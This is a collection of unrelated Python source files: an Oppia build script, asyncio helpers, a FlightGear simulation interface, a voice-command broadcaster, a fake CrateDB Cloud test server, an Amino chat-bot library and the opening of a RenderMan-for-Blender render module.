if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belongs to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
utils.py
|
import asyncio
from concurrent.futures import Future
import functools
import threading
import typing as tp
from pypeln import utils as pypeln_utils
def Namespace(**kwargs) -> tp.Any:
return pypeln_utils.Namespace(**kwargs)
def get_running_loop() -> asyncio.AbstractEventLoop:
try:
loop = asyncio.get_event_loop()
except RuntimeError:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if not loop.is_running():
def run():
loop.run_forever()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
return loop
def run_coroutine_in_loop(
f_coro: tp.Callable[[], tp.Awaitable],
loop: tp.Optional[asyncio.AbstractEventLoop] = None,
) -> Future:
loop = loop if loop else get_running_loop()
return asyncio.run_coroutine_threadsafe(f_coro(), loop)
def run_function_in_loop(
f: tp.Callable[[], tp.Any],
loop: tp.Optional[asyncio.AbstractEventLoop] = None,
) -> asyncio.Handle:
loop = loop if loop else get_running_loop()
return loop.call_soon_threadsafe(f)
def run_test_async(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
return run_coroutine_in_loop(lambda: f(*args, **kwargs)).result()
return wrapped
|
fgbase.py
|
import threading
import socket
import time
import math
import typing
import numpy as np
import pymap3d as pm
from abc import ABC
from scipy.spatial.transform import Rotation
import csaf.core.trace
class Dubins2DConverter():
"""
Originally from John McCarroll, modified by Michal Podhradsky
Converts orientation and rotation from ENU to ECEF
"""
@staticmethod
def quaternion_from_lon_lat(lon: float, lat: float) -> typing.List[float]:
"""
A helper function to calculate a quaternion representation of a rotation from ENU to ECEF
parameters: longitude and latitude (radians)
returns: list of quaternion components (scalar last)
"""
zd2 = 0.5 * lon
yd2 = -0.25 * math.pi - 0.5 * lat
Szd2 = math.sin(zd2)
Syd2 = math.sin(yd2)
Czd2 = math.cos(zd2)
Cyd2 = math.cos(yd2)
w = Czd2 * Cyd2
x = -Szd2 * Syd2
y = Czd2 * Syd2
z = Szd2 * Cyd2
return [x, y, z, w]
@classmethod
def convert_to_ecef(cls, pn_m: float, pe_m: float, pu_m: float,
phi_rad: float, theta_rad: float, psi_rad: float,
lat0_rad: float, lon0_rad: float, h0_m: float) -> typing.Tuple[float]:
"""
This method takes in a dictionary of "raw" 2D Dubins log data, as read from the LogReader class,
and returns a populated Episode object.
"""
# position conversions
## ENU to ECEF
# convert position to geocentric (Earth-centered) reference frame
ecef_x, ecef_y, ecef_z = pm.enu2ecef(pe_m, pn_m, pu_m, lat0_rad, lon0_rad, h0_m, ell=None, deg=False)
# orientation conversions
## ECEF
# 1st rotation (frame alignment)
global_rotation = Rotation.from_quat(Dubins2DConverter.quaternion_from_lon_lat(
lon0_rad, lat0_rad))
# 2nd rotation (from data)
local_rotation = Rotation.from_euler('xyz', [phi_rad, theta_rad, psi_rad], degrees=False)
# multiply
rotation = global_rotation * local_rotation
quaternion = rotation.as_quat()
angle = 2 * math.acos(quaternion[3]) # cos(a / 2) = w
direction = quaternion / (math.sin(angle / 2)) # [Vx,Vy,Vz] * sin(a / 2) = [x,y,z]
ecef_x_orientation = direction[0] * angle
ecef_y_orientation = direction[1] * angle
ecef_z_orientation = direction[2] * angle
return (
ecef_x, ecef_y, ecef_z,
ecef_x_orientation,
ecef_y_orientation,
ecef_z_orientation
)
class FlightGearBase(ABC):
# Start position of the aircraft
DEFAULT_FG_LAT = 35.802117
DEFAULT_FG_LON = -117.806717
DEFAULT_FG_GROUND_LEVEL = 1500 #715 # m
# Default max values for actutors
DEFAULT_FG_AILERON_MAX_DEG = 21.5
DEFAULT_FG_ELEVATOR_MAX_DEG = 25
DEFAULT_FG_RUDDER_MAX_DEG = 30.0
FG_FT_IN_M = 3.2808
# Networking variables
DEFAULT_FG_IP = "127.0.0.1"
DEFAULT_DELTA_T = 0.5
# Class variables
reset_flag = False
plant = None
controller = None
lag = DEFAULT_DELTA_T
speed = 1.0
initial_time = None
sim_flag = False
stopped = False
main_loop = None
lat0 = np.deg2rad(DEFAULT_FG_LAT)
lon0 = np.deg2rad(DEFAULT_FG_LON)
h0 = DEFAULT_FG_GROUND_LEVEL
sock_args = (socket.AF_INET, socket.SOCK_DGRAM) # UDP
def __init__(self) -> None:
self.sock = socket.socket(*self.sock_args)
def reset(self):
"""
Set the aircrat at the beginning of the trajectory
"""
self.reset_flag = True
def set_trajs(self, plant: csaf.trace.TimeTrace, controller: csaf.trace.TimeTrace):
"""
Set trajectories
"""
self.plant = plant
self.controller = controller
def simulate(self, delta_t: float =0.1, speed: float =1.0):
"""
Start simulation, assuming trajectories are properly set
"""
self.lag = delta_t
self.speed = speed
self.initial_time = time.monotonic()
self.sim_flag = True
def start(self):
"""
Start the main loop of the component
"""
if self.main_loop is None:
self.main_loop = threading.Thread(target=self.sim_loop, args=[], daemon=True)
self.main_loop.start()
def stop(self):
"""
Stop the main loop of the component
"""
self.stopped = True
def pack_to_struct(self):
"""
Package the data into a network compatible struct
"""
pass
def update_and_send(self, inputs: typing.Optional[typing.List[float]] =None):
"""
Update the internal values and send a FG compatible packet
The expected format of `inputs` is:
- float64 vt 0
- float64 alpha 1
- float64 beta 2
- float64 phi 3
- float64 theta 4
- float64 psi 5
- float64 p 6
- float64 q 7
- float64 r 8
- float64 pn 9
- float64 pe 10
- float64 h 11
- float64 pow 12
- float64 delta_e 13
- float64 delta_a 14
- float64 delta_r 15
- float64 throttle 16
"""
pass
def get_format_string(self) -> str:
"""
Returns format string for the network packet
"""
pass
def sim_loop(self):
"""
Main simulation loop
"""
print(f"<{self.__class__.__name__}> Starting main loop!")
while not self.stopped:
updated_input = None
if self.sim_flag:
real_time = time.monotonic()
sim_time = (real_time - self.initial_time)*self.speed
timestamp = next(filter(lambda x: x > sim_time, self.plant.times), None)
if timestamp:
# Plant states
idx = self.plant.times.index(timestamp)
states = self.plant.states[idx]
# Controller output
# TODO: if no controller is present, just fill in zeros
try:
idx = self.controller.times.index(timestamp)
except ValueError:
idx = 0
ctrls = self.controller.states[idx]
updated_input = np.concatenate((np.asarray(states),ctrls))
else:
self.sim_flag = False
self.lag = self.DEFAULT_DELTA_T
elif self.reset_flag:
idx = 0
states = self.plant.states[idx]
ctrls = self.controller.states[idx]
updated_input = np.concatenate((np.asarray(states),ctrls))
self.reset_flag = False
self.update_and_send(updated_input)
time.sleep(self.lag)
print(f"<{self.__class__.__name__}> Main loop stopped.")
|
VoiceEngineServer.py
|
import zmq
import time
from threading import *
import speech_recognition as sr
broadcastMSG = "None"
def Listener():
global broadcastMSG
while(1):
# obtain audio from the microphone
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
# recognize speech using Google Speech Recognition
try:
recognizedCommand = r.recognize_google(audio);
print("Google Speech Recognition thinks you said " + recognizedCommand)
if(recognizedCommand == "start"):
broadcastMSG = "start"
elif(recognizedCommand == "stop"):
broadcastMSG = "stop"
elif(recognizedCommand == "clockwise"):
broadcastMSG = "clockwise"
elif(recognizedCommand == "counter clockwise"):
broadcastMSG = "counter clockwise"
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
if __name__ == "__main__":
voiceThrad = Thread(target = Listener)
voiceThrad.start()
ctx = zmq.Context.instance()
publisher = ctx.socket(zmq.PUB)
publisher.bind("tcp://*:9999")
counter = 0
lastMessage = "lastMessage"
while(1):
if(lastMessage != broadcastMSG):
publisher.send_string(broadcastMSG)
print("Broadcast Message " + str(counter) + " : " + broadcastMSG)
lastMessage = broadcastMSG
counter += 1
time.sleep(0.05)
|
fake_cloud.py
|
# Licensed to CRATE Technology GmbH ("Crate") under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
import json
import pathlib
import ssl
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from typing import Callable, Dict
from urllib import parse
class Response:
__slots__ = ("bytes", "status", "headers")
def __init__(self, *, text=None, json_data=None, status=200, headers=None):
self.status = status
self.headers = headers or {}
if json_data is not None:
self.headers.setdefault("Content-Type", "application/json")
text = json.dumps(json_data)
else:
text = text or ""
self.headers.setdefault("Content-Type", "text/html")
self.bytes = text.encode()
self.headers["Content-Length"] = len(self.bytes)
class FakeCrateDBCloudServer(HTTPServer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load certificates and sign key used to simulate ssl/tls
here = pathlib.Path(__file__)
self.ssl_cert = here.parent / "server.crt"
ssl_key = here.parent / "server.key"
self.socket = ssl.wrap_socket(
self.socket,
keyfile=str(ssl_key),
certfile=str(self.ssl_cert),
server_side=True,
)
class FakeCrateDBCloudRequestHandler(BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self.routes: Dict[str, Callable[[], Response]] = {
"/data/data-key": self.data_data_key,
"/data/no-key": self.data_no_key,
"/errors/400": self.error_400,
"/text-response": self.text_response,
"/empty-response": self.empty_response,
"/redirect": self.redirect,
"/new-token": self.new_token,
"/client-headers": self.client_headers,
}
super().__init__(*args, **kwargs)
def do_GET(self):
parsed = parse.urlparse(self.path)
self.request_path = parsed.path
self.query = parse.parse_qs(parsed.query)
body_length = int(self.headers.get("Content-Length", 0))
if body_length > 0:
self.body = self.rfile.read(body_length)
else:
self.body = None
self.cookies = dict(
cookie.split("=", 1)
for cookie in self.headers.get_all("cookie", [])
if cookie
)
handler = self.routes.get(self.request_path, self.default_response)
response = handler()
self.send_response(response.status)
for header, value in response.headers.items():
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.bytes)
do_DELETE = do_GET
do_HEAD = do_GET
do_PATCH = do_GET
do_POST = do_GET
do_PUT = do_GET
def default_response(self) -> Response:
return Response(
json_data={
"body": self.body,
"headers": dict(self.headers), # type: ignore
"method": self.command,
"path": self.request_path,
"query": self.query,
},
status=404,
)
def data_data_key(self) -> Response:
if self.is_authorized:
return Response(json_data={"data": {"key": "value"}}, status=200)
return Response(status=302, headers={"Location": "/"})
def data_no_key(self) -> Response:
if self.is_authorized:
return Response(json_data={"key": "value"})
return Response(status=302, headers={"Location": "/"})
def error_400(self) -> Response:
if self.is_authorized:
return Response(
json_data={
"message": "Bad request.",
"errors": {"key": "Error on 'key'"},
},
status=400,
)
return Response(status=302, headers={"Location": "/"})
def text_response(self) -> Response:
if self.is_authorized:
return Response(text="Non JSON response.", status=500)
return Response(status=302, headers={"Location": "/"})
def empty_response(self) -> Response:
if self.is_authorized:
return Response(status=204)
return Response(status=302, headers={"Location": "/"})
def redirect(self) -> Response:
return Response(status=301, headers={"Location": "/?rd=%2Fredirect"})
def new_token(self) -> Response:
return Response(
status=204, headers={"Set-Cookie": "session=new-token; Domain=127.0.0.1"}
)
def client_headers(self) -> Response:
return Response(json_data=dict(self.headers.items()))
@property
def is_authorized(self) -> bool:
if "session" in self.cookies:
if self.cookies["session"]:
return True
return False
def log_message(self, *args, **kwargs):
# Don't log anything during tests.
pass
class FakeCrateDBCloud:
def __init__(self):
self._server = FakeCrateDBCloudServer(
("127.0.0.1", 0), FakeCrateDBCloudRequestHandler
)
self._thread = Thread(target=self._server.serve_forever, daemon=True)
def start_in_background(self) -> "FakeCrateDBCloud":
self._thread.start()
return self
def wait_for_shutdown(self):
self._server.shutdown()
@property
def port(self):
return self._server.socket.getsockname()[1]
def __enter__(self):
return self.start_in_background()
def __exit__(self, exc_type, exc_value, traceback):
self.wait_for_shutdown()
|
BotAmino.py
|
import requests
import json
from time import sleep as slp
from sys import exit
from json import dumps
from pathlib import Path
from threading import Thread
# from concurrent.futures import ThreadPoolExecutor
from contextlib import suppress
from uuid import uuid4
from .local_amino import Client
from .commands import *
from .extensions import *
from .Bot import Bot
# this is Slimakoi's API with some of my patches
# API made by ThePhoenix78
# Big optimisation thanks to SempreLEGIT#1378 ♥
# small very small changes by meliodas
# if login method is not working use sid
path_utilities = "utilities"
path_amino = f'{path_utilities}/amino_list'
path_client = "client.txt"
NoneType = type(None)
with suppress(Exception):
for i in (path_utilities, path_amino):
Path(i).mkdir(exist_ok=True)
def print_exception(exc):
print(repr(exc))
class BotAmino(Command, Client, TimeOut, BannedWords):
def __init__(self, email: str = None, password: str = None, sid: str = None, proxies: dict = None, deviceId: str = "32255726EEA11E60ACD268CA4DD36C8E6517144FCD24D7A53B144DE77B57980B26386188009D2BDEDE", certificatePath: str = None):
Command.__init__(self)
Client.__init__(self, proxies=proxies, deviceId=deviceId, certificatePath=certificatePath)
if email and password:
self.login(email=email, password=password)
elif sid:
self.login_sid(SID=sid)
else:
try:
with open(path_client, "r") as file_:
para = file_.readlines()
self.login(email=para[0].strip(), password=para[1].strip())
except FileNotFoundError:
with open(path_client, 'w') as file_:
file_.write('email\npassword')
print("Please enter your email and password in the file client.txt")
print("-----end-----")
exit(1)
self.communaute = {}
self.botId = self.userId
self.len_community = 0
self.perms_list = []
self.prefix = "!"
self.activity = False
self.wait = 0
self.bio = None
self.self_callable = False
self.no_command_message = ""
self.spam_message = "You are spamming, be careful"
self.lock_message = "Command locked sorry"
self.launched = False
def tradlist(self, sub):
sublist = []
for elem in sub:
with suppress(Exception):
val = self.get_from_code(f"http://aminoapps.com/u/{elem}").objectId
sublist.append(val)
continue
sublist.append(elem)
return sublist
def send_data(self, data):
self.send(data)
def add_community(self, comId):
self.communaute[comId] = Bot(self, comId, self.prefix, self.bio, self.activity)
def get_community(self, comId):
return self.communaute[comId]
def is_it_bot(self, uid):
return uid == self.botId and not self.self_callable
def is_it_admin(self, uid):
return uid in self.perms_list
def get_wallet_amount(self):
return self.get_wallet_info().totalCoins
def generate_transaction_id(self):
return str(uuid4())
def start_screen_room(self, comId: str, chatId: str, joinType: int=1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = dumps(data)
self.send(data)
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = dumps(data)
self.send(data)
def join_screen_room(self, comId: str, chatId: str, joinType: int=1):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = dumps(data)
self.send(data)
def start_voice_room(self, comId: str, chatId: str, joinType: int=1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = dumps(data)
self.send(data)
def end_voice_room(self, comId: str, chatId: str, joinType: int = 2):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = dumps(data)
self.send(data)
def show_online(self, comId):
data = {
"o": {
"actions": ["Browsing"],
"target": f"ndc://x{comId}/",
"ndcId": int(comId),
"id": "82333"
},
"t":304}
data = dumps(data)
slp(2)
self.send(data)
def upload_bubble(self,file,comId):
data=file
response = requests.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=data, headers=self.headers)
bid=json.loads(response.text)['chatBubble']['bubbleId']
print(bid)
response = requests.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/{bid}", data=data, headers=self.headers)
if response.status_code !=200:
return json.loads(response.text)
else: return bid
def check(self, args, *can, id_=None):
id_ = id_ if id_ else args.authorId
foo = {'staff': args.subClient.is_in_staff,
'bot': self.is_it_bot}
for i in can:
if foo[i](id_):
return True
def check_all(self):
amino_list = self.sub_clients()
for com in amino_list.comId:
try:
self.communaute[com].check_in()
except Exception:
pass
def threadLaunch(self, commu, passive: bool=False):
self.communaute[commu] = Bot(self, commu, self.prefix, self.bio, passive)
slp(30)
if passive:
self.communaute[commu].passive()
def launch(self, passive: bool = False):
amino_list = self.sub_clients()
self.len_community = len(amino_list.comId)
[Thread(target=self.threadLaunch, args=[commu, passive]).start() for commu in amino_list.comId]
if self.launched:
return
if self.categorie_exist("command") or self.categorie_exist("answer"):
self.launch_text_message()
if self.categorie_exist("on_member_join_chat"):
self.launch_on_member_join_chat()
if self.categorie_exist("on_member_leave_chat"):
self.launch_on_member_leave_chat()
if self.categorie_exist("on_other"):
self.launch_other_message()
if self.categorie_exist("on_remove"):
self.launch_removed_message()
if self.categorie_exist("on_delete"):
self.launch_delete_message()
if self.categorie_exist("on_all"):
self.launch_all_message()
if self.categorie_exist("on_event"):
self.launch_on_event()
self.launched = True
def single_launch(self, commu, passive: bool = False):
amino_list = self.sub_clients()
self.len_community = len(amino_list.comId)
Thread(target=self.threadLaunch, args=[commu, passive]).start()
if self.launched:
return
if self.categorie_exist("command") or self.categorie_exist("answer"):
self.launch_text_message()
if self.categorie_exist("on_member_join_chat"):
self.launch_on_member_join_chat()
if self.categorie_exist("on_member_leave_chat"):
self.launch_on_member_leave_chat()
if self.categorie_exist("on_other"):
self.launch_other_message()
if self.categorie_exist("on_remove"):
self.launch_removed_message()
if self.categorie_exist("on_delete"):
self.launch_delete_message()
if self.categorie_exist("on_all"):
self.launch_all_message()
self.launched = True
def message_analyse(self, data, type):
try:
commuId = data.comId
subClient = self.get_community(commuId)
except Exception:
return
args = Parameters(data, subClient)
Thread(target=self.execute, args=[type, args, type]).start()
def on_member_event(self, data, type):
try:
commuId = data.comId
subClient = self.get_community(commuId)
except Exception:
return
args = Parameters(data, subClient)
if not self.check(args, "bot"):
Thread(target=self.execute, args=[type, args, type]).start()
def launch_text_message(self):
@self.event("on_text_message")
def on_text_message(data):
try:
commuId = data.comId
subClient = self.get_community(commuId)
except Exception:
return
args = Parameters(data, subClient)
if "on_message" in self.commands.keys():
Thread(target=self.execute, args=["on_message", args, "on_message"]).start()
if not self.check(args, 'staff', 'bot') and subClient.banned_words:
self.check_banned_words(args)
if not self.timed_out(args.authorId) and args.message.startswith(subClient.prefix) and not self.check(args, "bot"):
subClient.send_message(args.chatId, self.spam_message)
return
elif "command" in self.commands.keys() and args.message.startswith(subClient.prefix) and not self.check(args, "bot"):
print(f"{args.author} : {args.message}")
command = args.message.lower().split()[0][len(subClient.prefix):]
if command in subClient.locked_command:
subClient.send_message(args.chatId, self.lock_message)
return
args.message = ' '.join(args.message.split()[1:])
self.time_user(args.authorId, self.wait)
if command.lower() in self.commands["command"].keys():
Thread(target=self.execute, args=[command, args]).start()
elif self.no_command_message:
subClient.send_message(args.chatId, self.no_command_message)
return
elif "answer" in self.commands.keys() and args.message.lower() in self.commands["answer"] and not self.check(args, "bot"):
print(f"{args.author} : {args.message}")
self.time_user(args.authorId, self.wait)
Thread(target=self.execute, args=[args.message.lower(), args, "answer"]).start()
return
def launch_other_message(self):
for type_name in ("on_strike_message", "on_voice_chat_not_answered",
"on_voice_chat_not_cancelled", "on_voice_chat_not_declined",
"on_video_chat_not_answered", "on_video_chat_not_cancelled",
"on_video_chat_not_declined", "on_voice_chat_start", "on_video_chat_start",
"on_voice_chat_end", "on_video_chat_end", "on_screen_room_start",
"on_screen_room_end", "on_avatar_chat_start", "on_avatar_chat_end"):
@self.event(type_name)
def on_other_message(data):
self.message_analyse(data, "on_other")
def launch_all_message(self):
for x in (self.chat_methods):
@self.event(self.chat_methods[x].__name__)
def on_all_message(data):
self.message_analyse(data, "on_all")
def launch_delete_message(self):
@self.event("on_delete_message")
def on_delete_message(data):
self.message_analyse(data, "on_delete")
def launch_removed_message(self):
for type_name in ("on_chat_removed_message", "on_text_message_force_removed", "on_text_message_removed_by_admin", "on_delete_message"):
@self.event(type_name)
def on_chat_removed(data):
self.message_analyse(data, "on_remove")
def launch_on_member_join_chat(self):
@self.event("on_group_member_join")
def on_group_member_join(data):
self.on_member_event(data, "on_member_join_chat")
def launch_on_member_leave_chat(self):
@self.event("on_group_member_leave")
def on_group_member_leave(data):
self.on_member_event(data, "on_member_leave_chat")
def launch_on_event(self):
for k, v in self.commands["on_event"].items():
@self.event(k)
def _function(data):
v(data)
|
rman_render.py
|
import time
import os
import rman
import bpy
import sys
from .rman_constants import RFB_VIEWPORT_MAX_BUCKETS, RMAN_RENDERMAN_BLUE
from .rman_scene import RmanScene
from .rman_scene_sync import RmanSceneSync
from. import rman_spool
from. import chatserver
from .rfb_logger import rfb_log
import socketserver
import threading
import subprocess
import ctypes
import numpy
import traceback
# for viewport buckets
import gpu
from gpu_extras.batch import batch_for_shader
# utils
from .rfb_utils.envconfig_utils import envconfig
from .rfb_utils import string_utils
from .rfb_utils import display_utils
from .rfb_utils import scene_utils
from .rfb_utils.prefs_utils import get_pref
# config
from .rman_config import __RFB_CONFIG_DICT__ as rfb_config
# roz stats
from .rman_stats import RfBStatsManager
__RMAN_RENDER__ = None
__RMAN_IT_PORT__ = -1
__BLENDER_DSPY_PLUGIN__ = None
__DRAW_THREAD__ = None
__RMAN_STATS_THREAD__ = None
def __turn_off_viewport__():
'''
Loop through all of the windows/areas and turn shading to SOLID
for all view_3d areas.
'''
rfb_log().debug("Attempting to turn off viewport render")
for window in bpy.context.window_manager.windows:
for area in window.screen.areas:
if area.type == 'VIEW_3D':
for space in area.spaces:
if space.type == 'VIEW_3D':
space.shading.type = 'SOLID'
area.tag_redraw()
def __update_areas__():
for window in bpy.context.window_manager.windows:
for area in window.screen.areas:
area.tag_redraw()
def __draw_callback__():
# callback function for the display driver to call tag_redraw
global __RMAN_RENDER__
if __RMAN_RENDER__.rman_is_viewport_rendering and __RMAN_RENDER__.bl_engine:
try:
__RMAN_RENDER__.bl_engine.tag_redraw()
pass
except ReferenceError as e:
return False
return True
return False
DRAWCALLBACK_FUNC = ctypes.CFUNCTYPE(ctypes.c_bool)
__CALLBACK_FUNC__ = DRAWCALLBACK_FUNC(__draw_callback__)
class ItHandler(chatserver.ItBaseHandler):
def dspyRender(self):
global __RMAN_RENDER__
if not __RMAN_RENDER__.is_running:
bpy.ops.render.render(layer=bpy.context.view_layer.name)
def dspyIPR(self):
global __RMAN_RENDER__
if __RMAN_RENDER__.rman_interactive_running:
crop = []
for c in self.msg.getOpt('crop').split(' '):
